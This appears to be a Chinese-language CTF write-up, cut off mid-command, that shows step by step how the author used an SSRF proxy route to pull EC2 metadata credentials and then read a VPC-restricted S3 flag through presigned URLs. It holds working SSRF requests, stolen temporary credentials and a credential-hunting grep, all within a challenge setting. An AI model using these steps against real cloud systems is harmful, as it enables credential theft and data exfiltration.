wiz2025 挑战赛从 springActuator 泄露到 s3 敏感文件获取全解析
背景经过几周的利用和权限提升你获得了访问你希望是最终服务器的权限然后可以使用它从 S3 存储桶中提取秘密旗帜。但这不会容易。目标使用 AWS 数据边界来限制对存储桶内容的访问。Youve discovered a Spring Boot Actuator application running on AWS: curl https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com{status:UP}解决过程Spring Boot Actuator 泄露首先我们分析一下flag 肯定是在存储桶中因为这里说了已经对我们的桶进行了限制所以匿名访问的方法可能没有作用不过这里还是尝试一下首先匿名访问需要获取存储桶的名称因为题目已经告诉了 Spring Boot Actuator 明显我们可以查看 env尝试列出ounter(lineounter(lineounter(lineusermonthly-challenge:~$ aws s3 ls s3://challenge01-470f711/ --no-sign-requestAn error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied不行没有权限所以我们必须去寻找凭证我第一想法就是元数据但是没有反应ounter(linecurl http://169.254.169.254/latest/meta-data估计这个 shell 不是一个 EC2 的然后就是寻找凭据了可以使用一些工具比如 truffleHog然后简单找了一下ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineusermonthly-challenge:/$ grep -ri --exclude-dir{/proc,/sys,/dev,/run,/snap,/var/lib/docker} Secret Access Key //usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/datazone/2018-05-10/service-2.json: documentation:pThe secret access key of a connection./p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/datazone/2018-05-10/service-2.json: documentation:pThe secret access key of the environment credentials./p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/s3control/2018-08-20/service-2.json: documentation:pThe secret access key of the Amazon Web Services STS temporary credential that S3 Access Grants vends to grantees and client applications. /p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/appflow/2020-08-23/service-2.json: documentation:p The Secret Access Key portion of the credentials. /p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/appflow/2020-08-23/service-2.json: documentation:p The Secret Access Key portion of the credentials. /p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/opsworks/2013-02-18/service-2.json: documentation:pWhen included in a request, the parameter depends on the repository type./p ul li pFor Amazon S3 bundles, set codePassword/code to the appropriate IAM secret access key./p /li li pFor HTTP bundles and Subversion repositories, set codePassword/code to the password./p /li /ul pFor more information on how to safely handle IAM credentials, see a href\https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html\https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html/a./p pIn responses, OpsWorks Stacks returns code*****FILTERED*****/code instead of the actual value./p/usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/s3/2006-03-01/service-2.json: documentation:pCreates a copy of an object that is already stored in Amazon S3./p note pYou can store individual objects of up to 5 TB in Amazon S3. You create a copy of your object up to 5 GB in size in a single atomic action using this API. However, to copy an object greater than 5 GB, you must use the multipart upload Upload Part - Copy (UploadPartCopy) API. For more information, see a href\https://docs.aws.amazon.com/AmazonS3/latest/dev/CopyingObjctsUsingRESTMPUapi.html\Copy Object Using the REST Multipart Upload API/a./p /note pYou can copy individual objects between general purpose buckets, between directory buckets, and between general purpose buckets and directory buckets./p note ul li pAmazon S3 supports copy operations using Multi-Region Access Points only as a destination when using the Multi-Region Access Point ARN. /p /li li p bDirectory buckets /b - For directory buckets, you must make requests for this API operation to the Zonal endpoint. These endpoints support virtual-hosted-style requests in the format codehttps://iamzn-s3-demo-bucket/i.s3express-izone-id/i.iregion-code/i.amazonaws.com/ikey-name/i /code. Path-style requests are not supported. For more information about endpoints in Availability Zones, see a href\https://docs.aws.amazon.com/AmazonS3/latest/userguide/endpoint-directory-buckets-AZ.html\Regional and Zonal endpoints for directory buckets in Availability Zones/a in the iAmazon S3 User Guide/i. For more information about endpoints in Local Zones, see a href\https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-lzs-for-directory-buckets.html\Concepts for directory buckets in Local Zones/a in the iAmazon S3 User Guide/i./p /li li pVPC endpoints dont support cross-Region requests (including copies). If youre using VPC endpoints, your source and destination buckets should be in the same Amazon Web Services Region as your VPC endpoint./p /li /ul /note pBoth the Region that you want to copy the object from and the Region that you want to copy the object to must be enabled for your account. For more information about how to enable a Region for your account, see a href\https://docs.aws.amazon.com/accounts/latest/reference/manage-acct-regions.html#manage-acct-regions-enable-standalone\Enable or disable a Region for standalone accounts/a in the iAmazon Web Services Account Management Guide/i./p important pAmazon S3 transfer acceleration does not support cross-Region copies. If you request a cross-Region copy using a transfer acceleration endpoint, you get a code400 Bad Request/code error. For more information, see a href\https://docs.aws.amazon.com/AmazonS3/latest/dev/transfer-acceleration.html\Transfer Acceleration/a./p /important dl dtAuthentication and authorization/dt dd pAll codeCopyObject/code requests must be authenticated and signed by using IAM credentials (access key ID and secret access key for the IAM identities). All headers with the codex-amz-/code prefix, including codex-amz-copy-source/code, must be signed. For more information, see a href\https://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html\REST Authentication/a./p p bDirectory buckets/b - You must use the IAM credentials to authenticate and authorize your access to the codeCopyObject/code API operation, instead of using the temporary security credentials through the codeCreateSession/code API operation./p pAmazon Web Services CLI or SDKs handles authentication and authorization on your behalf./p /dd dtPermissions/dt dd pYou must have iread/i access to the source object and iwrite/i access to the destination bucket./p ul li p bGeneral purpose bucket permissions/b - You must have permissions in an IAM policy based on the source and destination bucket types in a codeCopyObject/code operation./p ul li pIf the source object is in a general purpose bucket, you must have b codes3:GetObject/code /b permission to read the source object that is being copied. /p /li li pIf the destination bucket is a general purpose bucket, you must have b codes3:PutObject/code /b permission to write the object copy to the destination bucket. /p /li /ul /li li p bDirectory bucket permissions/b - You must have permissions in a bucket policy or an IAM identity-based policy based on the source and destination bucket types in a codeCopyObject/code operation./p ul li pIf the source object that you want to copy is in a directory bucket, you must have the b codes3express:CreateSession/code /b permission in the codeAction/code element of a policy to read the object. By default, the session is in the codeReadWrite/code mode. If you want to restrict the access, you can explicitly set the codes3express:SessionMode/code condition key to codeReadOnly/code on the copy source bucket./p /li li pIf the copy destination is a directory bucket, you must have the b codes3express:CreateSession/code /b permission in the codeAction/code element of a policy to write the object to the destination. The codes3express:SessionMode/code condition key cant be set to codeReadOnly/code on the copy destination bucket. /p /li /ul pIf the object is encrypted with SSE-KMS, you must also have the codekms:GenerateDataKey/code and codekms:Decrypt/code permissions in IAM identity-based policies and KMS key policies for the KMS key./p pFor example policies, see a href\https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-express-security-iam-example-bucket-policies.html\Example bucket policies for S3 Express One Zone/a and a href\https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-express-security-iam-identity-policies.html\Amazon Web Services Identity and Access Management (IAM) identity-based policies for S3 Express One Zone/a in the iAmazon S3 User Guide/i./p /li /ul /dd dtResponse and special errors/dt dd pWhen the request is an HTTP 1.1 request, the response is chunk encoded. When the request is not an HTTP 1.1 request, the response would not contain the codeContent-Length/code. You always need to read the entire response body to check if the copy succeeds. /p ul li pIf the copy is successful, you receive a response with information about the copied object./p /li li pA copy request might return an error when Amazon S3 receives the copy request or while Amazon S3 is copying the files. A code200 OK/code response can contain either a success or an error./p ul li pIf the error occurs before the copy action starts, you receive a standard Amazon S3 error./p /li li pIf the error occurs during the copy operation, the error response is embedded in the code200 OK/code response. For example, in a cross-region copy, you may encounter throttling and receive a code200 OK/code response. For more information, see a href\https://repost.aws/knowledge-center/s3-resolve-200-internalerror\Resolve the Error 200 response when copying objects to Amazon S3/a. The code200 OK/code status code means the copy was accepted, but it doesnt mean the copy is complete. Another example is when you disconnect from Amazon S3 before the copy is complete, Amazon S3 might cancel the copy and you may receive a code200 OK/code response. You must stay connected to Amazon S3 until the entire response is successfully received and processed./p pIf you call this API operation directly, make sure to design your application to parse the content of the response and handle it appropriately. If you use Amazon Web Services SDKs, SDKs handle this condition. The SDKs detect the embedded error and apply error handling per your configuration settings (including automatically retrying the request as appropriate). If the condition persists, the SDKs throw an exception (or, for the SDKs that dont use exceptions, they return an error)./p /li /ul /li /ul /dd dtCharge/dt dd pThe copy request charge is based on the storage class and Region that you specify for the destination object. The request can also result in a data retrieval charge for the source if the source storage class bills for data retrieval. If the copy source is in a different region, the data transfer is billed to the copy source account. For pricing information, .....找了也没有常规的收集都没有发现然后只能根据提示继续在 spring 这个面努力了然后去批量爆破一波查看是否有可利用的信息然后又把 mapping 中的路由全部提取出来看到了 proxy 路由这个应该就是拿来访问元数据的了元数据绕过一般都有 ssrf 漏洞ounter(lineounter(lineusermonthly-challenge:/$ curl https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://169.254.169.254/latest/meta-data/HTTP error: 401 Unauthorized可以看到至少是可以成功访问元数据了只不过没有权限因为之后采用了 IMDSv2我们首先获取 token使用 PUT 请求ounter(lineounter(lineounter(lineounter(lineounter(lineusermonthly-challenge:/$ curl -X PUT \-H X-aws-ec2-metadata-token-ttl-seconds: 21600 \https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://169.254.169.254/latest/api/tokenAQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q可以看到获取到了 Token我们尝试使用 token 来访问元数据ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineusermonthly-challenge:/$ curl -H X-aws: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://169.254.169.254/latest/meta-data/ami-idami-launch-indexami-manifest-pathblock-device-mapping/events/hibernation/hostnameiam/identity-credentials/instance-actioninstance-idinstance-life-cycleinstance-typelocal-hostnamelocal-ipv4macmetrics/network/placement/profilepublic-hostnamepublic-ipv4public-keys/reservation-idsecurity-groupsservices/system可以了我们访问凭证信息ounter(lineounter(lineounter(lineusermonthly-challenge:/$ curl -H X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q \https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368然后使用它的凭证ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineusermonthly-challenge:/$ curl -H X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368{Code : Success,LastUpdated : 2025-07-10T13:26:52Z,Type : AWS-HMAC,AccessKeyId : ASIARK***WELX36,SecretAccessKey : PsrjWrAANNHBG3n***NmUHVglREBV,Token : IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH4pBiUXSj7Xih2aQvR3LmiwIQ8TeLO6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/EDfizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqFyWFZz/IuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwpJUdXyIUaYjLrJhdklRXKoSNxR/K/F2TOGOM/YPt/NBZkVtbz**********XY1V06MlGJc/NUiiVgxc897d4k5W2uA8xv5kcIplBucOvyhQt3KnEYdnnkuNQQbwiR2BRwcE2xziZgpRz5ORQZZWenL4Zkvu4lT4Zbue72g1R1zTIRCWbZbozlboOFERlW7xH2TPmydpym2TR55jtuzpWTs5YY3UEOUAiKkRcTVl1S3syg/gxcFFF1NkVvvnfyzzrITJecoQVqu5Z5UJA0OJHujCErtSbz5tSTklDjnnamBiQncgEToQF1XUHoQDCPBujhFo51ZlrHCushABlLy5442TkGisaqjy3VJiDDxJEJ0cOj6PpY/1rAfSN1XqQ9n4aKstqtOuPvVSiwDU0PQPc4pklhLzMBcKkuU34MvYqyFJdlGw6jwKSkMIC4w9jbkBXDOxNyvfavCKyjgDrEEUlCVDhVIg3XDlbXegK7YLEy5LZjkHOCqqFNZU1xhs7XIPL66QiC9qtl89fpZhOjJmoFCcsaz4JziQxJUK3gJPTXDTxdsHEmfRifR2obZp9APzMWmiupaObp1LzlBX/nnmQCUBk9xSoBCpdG8VmzeTgiXToIZlU/5UNsVFkYV7JbwQwsz8yS4m2KgYDNhlH4qTznSEqJ5AXLG63jncUf7WDtjxqNcJrxFZUCMfW2BesYYc0KvfJk8wVQQH2HSC/BP2awZnk/3YkyKdYO/wKHSPdnA6Cy9GkI/xoCx6h/O9LD5Ywy/wwY6sQG0KBoj2EpZ/wZgOVThpuOZ00uWBMZd42YuJ2n65OkipCFeKjCjiIkwD9i/eT/xxPMW1Yqid2CkBLp7SW3YjeqM5IqKvfPhqtKaw6mNcAu669Q2QQfLQV8HuQbTD0Ef9py8I8TT14K/uRGYzuhu2G1JpobQKDp1Y1XpElslx/PiaS9FTJHszMXcaQn15ZbFWsstGrnq/WJSQzMTwfmHejhezCYawGzX7vvdHHn9uA9U,Expiration : 2025-07-10T19:47:29Z}有了这些我们就可以配置了 首先我们进行配置ounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws configure set aws_access_key_id ASIARK7LBO**EXWELX36 --profile challenge01roothcss-ecs-0d0e:~# aws configure set aws_secret_access_key PsrjWrAANNHBG3ngmwQXdCdc******mUHVglREBV --profile challenge01roothcss-ecs-0d0e:~# aws configure set aws_session_token IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH4pBiUXSj7Xih2aQvR3LmiwIQ8TeLO6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/EDfizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqFyWFZz/IuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwpJUdXyIUaYjLrJhdklRXKoSNxR/K/F2TOGOM/YPt/NBZkVtbzzHk529ssd4hZI5/kF/SZDjKFf7noted1swutAbWzGpS6CxJIRhWP19d6YFqxXY1V06MlGJc/NUiiVgxc897d4k5W2uA8xv5kcIplBucOvyhQt3KnEYdnnkuNQQbwiR2BRwcE2xziZgpRz5ORQZZWenL4Zkvu4lT4Zbue72g1R1zTIRCWbZbozlboOFERlW7xH2TPmydpym2TR55jtuzpWTs5YY3****lLy5442TkGisaqjy3VJiDDxJEJ0cOj6PpY/1rAfSN1XqQ9n4aKstqtOuPvVSiwDU0PQPc4pklhLzMBcKkuU34MvYqyFJdlGw6jwKSkMIC4w9jbkBXDOxNyvfavCKyjgDrEEUlCVDhVIg3XDlbXegK7YLEy5LZjkHOCqqFNZU1xhs7XIPL66QiC9qtl89fpZhOjJmoFCcsaz4JziQxJUK3gJPTXDTxdsHEmfRifR2obZp9APzMWmiupaObp1LzlBX/nnmQCUBk9xSoBCpdG8VmzeTgiXToIZlU/5UNsVFkYV7JbwQwsz8yS4m2KgYDNhlH4qTznSEqJ5AXLG63jncUf7WDtjxqNcJrxFZUCMfW2BesYYc0KvfJk8wVQQH2HSC/BP2awZnk/3YkyKdYO/wKHSPdnA6Cy9GkI/xoCx6h/O9LD5Ywy/wwY6sQG0KBoj2EpZ/wZgOVThpuOZ00uWBMZd42YuJ2n65OkipCFeKjCjiIkwD9i/eT/xxPMW1Yqid2CkBLp7SW3YjeqM5IqKvfPhqtKaw6mNcAu669Q2QQfLQV8HuQbTD0Ef9py8I8TT14K/uRGYzuhu2G1JpobQKDp1Y1XpElslx/PiaS9FTJHszMXcaQn15ZbFWsstGrnq/WJSQzMTwfmHejhezCYawGzX7vvdHHn9uA9U --profile challenge01之后我们就会有这个用户的权限了目标文件位置获取我们首先查一下这个用户有的 bucket 的权限首先获取当前用户信息ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws sts get-caller-identity --profile challenge01{UserId: AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279,Account: 092297851374,Arn: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279}然后我们查看对应的策略ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws iam simulate-principal-policy \--policy-source-arn arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 \--action-names s3:ListBucket s3:GetObject s3:PutObject s3:DeleteObject s3:ListAllMyBuckets \--profile challenge01An error occurred (AccessDenied) when calling the SimulatePrincipalPolicy operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:SimulatePrincipalPolicy on resource: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 because no identity-based policy allows the iam:SimulatePrincipalPolicy actionroothcss-ecs-0d0e:~#可惜这个用户没有权限我们直接列ounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws s3 ls --profile challenge01An error occurred (AccessDenied) when calling the ListBuckets operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: s3:ListAllMyBuckets because no identity-based policy allows the s3:ListAllMyBuckets action没有列出桶的权限不过我们知道桶的名称ounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws s3 ls s3://challenge01-470f711/ --recursive --profile challenge012025-06-19 01:15:24 29 hello.txt2025-06-17 06:01:49 51 private/flag.txt读取文件绕过尝试读取的时候可惜ounter(lineounter(lineroothcss-ecs-0d0e:~# aws s3 cp s3://challenge01-470f711/private/flag.txt - --profile challenge01download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden没有读的权限我们还是得查查存储桶的策略ounter(lineounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# aws s3api get-bucket-policy --bucket challenge01-470f711 --profile challenge01{Policy: {\Version\:\2012-10-17\,\Statement\:[{\Effect\:\Deny\,\Principal\:\*\,\Action\:\s3:GetObject\,\Resource\:\arn:aws:s3:::challenge01-470f711/private/*\,\Condition\:{\StringNotEquals\:{\aws:SourceVpce\:\vpce-0dfd8b6aa1642a057\}}}]}}限制只有指定 VPC 端点VPCe 的请求才可以访问否则即使有权限也会被拒绝怎么办呢聪明的 GPT 给出了答案也让我想起了 proxyounter(lineounter(lineounter(lineroothcss-ecs-0d0e:~# curl https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?urlhttp://s3.amazonaws.com/challenge01-470f711/private/flag.txtHTTP error: 403 Forbiddenroot但是结果是还是被阻止了这里可能 proxy 不在 VPC不过我们可以验证一下但是刚刚都读取成功了大概率是在的没办法只能寻找好朋友的帮助了首先需要了解一下 SigV4 签名在 AWS 中访问私有资源如 S3 对象时AWS 要求你的请求是已签名的参考https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html默认情况下所有 Amazon S3 对象都是私有的只有对象拥有者才具有访问它们的权限。但是对象拥有者可以通过创建预签名 URL 与其他人共享对象。预签名 URL 使用安全凭证来授予下载对象的限时权限。可以在浏览器中输入此 URL或者程序使用此 URL 来下载对象。预签名 URL 使用的凭证是生成该 URL 的 AWS 用户的凭证。我们需要使用预签名https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/using-presigned-url.html创建预签名 URL 时必须提供您的安全凭证然后指定以下内容一个 Amazon S3 存储桶对象键如果将在您的 Amazon S3 存储桶中下载此对象则一旦上传这就是要上传的文件名HTTP 方法GET 用于下载对象、PUT 用于上传、HEAD 用于读取对象元数据等过期时间间隔按照这个我们直接运行命令生成如下的签名ounter(lineounter(lineroothcss-ecs-0d0e:~# aws s3 presign s3://challenge01-470f711/private/flag.txt --profile challenge01 --expires-in 3600https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?AWSAccessKeyIdASIARK7LBOHXEXWELX36SignatureWT7zPvNKLF6zr%2Fi4%2FGvqpJHoZzs%3Dx-amz-security-tokenIQoJb3JpZ2luX2VjELb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIC6AH%2B4pBi%2BUXSj7Xih2aQvR3LmiwIQ8TeL%2BO6Gv2iotAiEAi6CjgMDpky%2FIC6HpBwzG52L%2FED%2BfizjGUTaX%2F5YP4KcqwQUIv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqF%2ByWFZz%2FIuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwp%2BJUdXyIUaYjLrJhd%2BklRXKoSNxR%2FK%2FF%2B2TOGOM%2FYPt%2FNBZkVtbzzHk529ssd4hZI5%2FkF%2FSZDjKFf7noted1swutAbWzGpS6CxJIRhWP19d6Y%2BFqxXY1V06MlGJc%2FNUii%2BVgxc897d4k5W2uA8xv5kcIplBucOvyhQt3KnEYdnnkuNQQbwiR2BRwcE2xziZgpRz5ORQZZWenL4Zkvu4lT4Zbue72g1R1zTIRCWbZbozlboOFERlW7xH2TPmydpym2TR55jtuzpWTs5YY3UEOUAiKkRcTVl1S3syg%2FgxcFFF1NkVvvnfyzzrITJecoQVq%2Bu5Z5UJA0OJHujCErtSbz5tSTklDjnnamBiQncgEToQF1XUHoQ%2BDCPBujhFo51ZlrHCushABlLy5442TkGisa%2Bqjy3V%2BJiDDxJEJ0cOj6PpY%2F1rAfSN1XqQ9n4aKstqtOuPvVSiwDU0PQPc4pklhLzMBcKkuU34MvYqyFJdlGw6jwKSkMIC4w9j%2BbkBXDOxNyvfavCKyjgDrEEUlCVDhVIg3XDlbXegK7YLE%2By5LZjkHOCqq%2BFNZU1xhs7XIPL66QiC9qt%2Bl89fpZhOjJmoFCcsaz4JziQxJUK3gJPTXDTxdsHEmfRifR2obZp9APzMWmiupaObp1LzlBX%2FnnmQCUBk9xSoB%2BCpdG8VmzeTgiXToIZlU%2F5UNsVFkYV7JbwQwsz8yS4m2KgYDNhlH4qTznSEqJ5AXLG63jncUf7WDtjxqNcJr%2BxFZUCMfW2BesYYc0KvfJk8wVQQH2HSC%2FBP2awZnk%2F3YkyKdYO%2FwKHSPdnA6Cy9GkI%2FxoCx6h%2FO9LD5Ywy%2F%2B%2BwwY6sQG0KBoj2EpZ%2FwZgOVThpuOZ00uWBMZd42YuJ2n65O%2BkipCFeKjCjiIkwD9i%2FeT%2FxxPMW1Yqid2CkBLp7SW3YjeqM5IqKvfPhqtKaw6mNcAu669Q2QQfLQV8HuQbTD0Ef9py8I8TT14K%2FuRGYzuhu2G1JpobQKDp1Y1XpElslx%2FPiaS9FTJHszM%2BXcaQn15ZbFWsstGrnq%2FWJSQzMTwfmHejhezCYawGz%2BX7vvdHHn9uA9U%3DExpires1752171219然后我们带着这个签名但是内容一直被截断很烦我直接 URL 全编码后再次去访问ounter(lineounter(lineroothcss-ecs-0d0e:~# curl https://ctf:88sPVWyC2P3pchallenge01.cloud-champions.com/proxy?url%68%74%74%70%73%3a%2f%2f%63%68%61%6c%6c%65%6e%67%65%30%31%2d%34%37%30%66%37%31%31%2e%73%33%2e%61%6d%61%7a%6f%6e%61%77%73%2e%63%6f%6d%2f%70%72%69%76%61%74%65%2f%66%6c%61%67%2e%74%78%74%3f%41%57%53%41%63%63%65%73%73%4b%65%79%49%64%3d%41%53%49%41%52%4b%37%4c%42%4f%48%58%45%58%57%45%4c%58%33%36%26%53%69%67%6e%61%74%75%72%65%3d%52%43%69%69%56%46%69%49%51%46%51%38%73%6b%48%79%30%59%74%42%57%69%76%4b%39%4a%6b%25%33%44%26%78%2d%61%6d%7a%2d%73%65%63%75%72%69%74%79%2d%74%6f%6b%65%6e%3d%49%51%6f%4a%62%33%4a%70%5a%32%6c%75%58%32%56%6a%45%4c%62%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%77%45%61%43%58%56%7a%4c%57%56%68%63%33%51%74%4d%53%4a%48%4d%45%55%43%49%43%36%41%48%25%32%42%34%70%42%69%25%32%42%55%58%53%6a%37%58%69%68%32%61%51%76%52%33%4c%6d%69%77%49%51%38%54%65%4c%25%32%42%4f%36%47%76%32%69%6f%74%41%69%45%41%69%36%43%6a%67%4d%44%70%6b%79%25%32%46%49%43%36%48%70%42%77%7a%47%35%32%4c%25%32%46%45%44%25%32%42%66%69%7a%6a%47%55%54%61%58%25%32%46%35%59%50%34%4b%63%71%77%51%55%49%76%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%25%32%46%41%52%41%41%47%67%77%77%4f%54%49%79%4f%54%63%34%4e%54%45%7a%4e%7a%51%69%44%47%70%79%4a%65%51%79%63%79%36%42%39%72%58%39%58%69%71%56%42%59%72%4e%6f%71%46%25%32%42%79%57%46%5a%7a%25%32%46%49%75%68%46%36%50%71%43%38%69%44%77%50%4a%39%75%46%73%70%49%6e%7a%62%63%4b%61%4a%38%36%51%78%31%69%73%73%4f%77%70%25%32%42%4a%55%64%58%79%49%55%61%59%6a%4c%72%4a%68%64%25%32%42%6b%6c%52%58%4b%6f%53%4e%78%52%25%32%46%4b%25%32%46%46%25%32%42%32%54%4f%47%4f%4d%25%32%46%59%50%74%25%32%46%4e%42%5a%6b%56%74%62%7a%7a%48%6b%35%32%39%73%73%64%34%68%5a%49%35%25%32%46%6b%46%25%32%46%53%5a%44%6a%4b%46%66%37%6e%6f%74%65%64%31%73%77%75%74%41%62%57%7a%47%70%53%36%43%78%4a%49%52%68%57%50%31%39%64%36%59%25%32%42%46%71%78%58%59%31%56%30%36%4d%6c%47%4a%63%25%32%46%4e%55%69%69%25%32%42%56%67%78%63%38%39%37%64%34%6b%35%57%32%75%41%38%78%76%35%6b%63%49%70%6c%42%75%63%4f%76%79%68%51%74%33%4b%6e%45%59%64%6e%6e%6b%75%4e%51%51%62%77%69%52%32%42%52%77%63%45%32%78%7a%69%5a%67%70%52%7a%35%4f%52%51%5a%5a%57%65%6e%4c%34%5a%6b%76%75%34%6c%54%34%5a%62%75%65%37%32%67%31%52%31%7a%54%49%52%43%57%62%5a%62%6f%7a%6c%62%6f%4f%46%45%52%6c%57%37%78%48%32%54%50%6d%79%64%70%79%6d%32%54%52%35%35%6a%74%75%7a%70%57%54%73%35%59%59%33%55%45%4f%55%41%69%4b%6b%52%63%54%56%6c%31%53%33%73%79%67%25%32%46%67%78%63%46%46%46%31%4e%6b%56%76%76%6e%66%79%7a%7a%72%49%54%4a%65%63%6f%51%56%71%25%32%42%75%35%5a%35%55%4a%41%30%4f%4a%48%75%6a%43%45%72%74%53%62%7a%35%74%53%54%6b%6c%44%6a%6e%6e%61%6d%42%69%51%6e%63%67%45%54%6f%51%46%31%58%55%48%6f%51%25%32%42%44%43%50%42%75%6a%68%46%6f%35%31%5a%6c%72%48%43%75%73%68%41%42%6c%4c%79%35%34%34%32%54%6b%47%69%73%61%25%32%42%71%6a%79%33%56%25%32%42%4a%69%44%44%78%4a%45%4a%30%63%4f%6a%36%50%70%59%25%32%46%31%72%41%66%53%4e%31%58%71%51%39%6e%34%61%4b%73%74%71%74%4f%75%50%76%56%53%69%77%44%55%30%50%51%50%63%34%70%6b%6c%68%4c%7a%4d%42%63%4b%6b%75%55%33%34%4d%76%59%71%79%46%4a%64%6c%47%77%36%6a%77%4b%53%6b%4d%49%43%34%77%39%6a%25%32%42%62%6b%42%58%44%4f%78%4e%79%76%66%61%76%43%4b%79%6a%67%44%72%45%45%55%6c%43%56%44%68%56%49%67%33%58%44%6c%62%58%65%67%4b%37%59%4c%45%25%32%42%79%35%4c%5a%6a%6b%48%4f%43%71%71%25%32%42%46%4e%5a%55%31%78%68%73%37%58%49%50%4c%36%36%51%69%43%39%71%74%25%32%42%6c%38%39%66%70%5a%68%4f%6a%4a%6d%6f%46%43%63%73%61%7a%34%4a%7a%69%51%78%4a%55%4b%33%67%4a%50%54%58%44%54%78%64%73%48%45%6d%66%52%69%66%52%32%6f%62%5a%70%39%41%50%7a%4d%57%6d%69%75%70%61%4f%62%70%31%4c%7a%6c%42%58%25%32%46%6e%6e%6d%51%43%55%42%6b%39%78%53%6f%42%25%32%42%43%70%64%47%38%56%6d%7a%65%54%67%69%58%54%6f%49%5a%6c%55%25%32%46%35%55%4e%73%56%46%6b%59%56%37%4a%62%77%51%77%73%7a%38%79%53%34%6d%32%4b%67%59%44%4e%68%6c%48%34%71%54%7a%6e%53%45%71%4a%35%41%58%4c%47%36%33%6a%6e%63%55%66%37%57%44%74%6a%78%71%4e%63%4a%72%25%32%42%78%46%5a%55%43%4d%66%57%32%42%65%73%59%59%63%30%4b%76%66%4a%6b%38%77%56%51%51%48%32%48%53%43%25%32%46%42%50%32%61%77%5a%6e%6b%25%32%46%33%59%6b%79%4b%64%59%4f%25%32%46%77%4b%48%53%50%64%6e%41%36%43%79%39%47%6b%49%25%32%46%78%6f%43%78%36%68%25%32%46%4f%39%4c%44%35%59%77%79%25%32%46%25%32%42%25%32%42%77%77%59%36%73%51%47%30%4b%42%6f%6a%32%45%70%5a%25%32%46%77%5a%67%4f%56%54%68%70%75%4f%5a%30%30%75%57%42%4d%5a%64%34%32%59%75%4a%32%6e%36%35%4f%25%32%42%6b%69%70%43%46%65%4b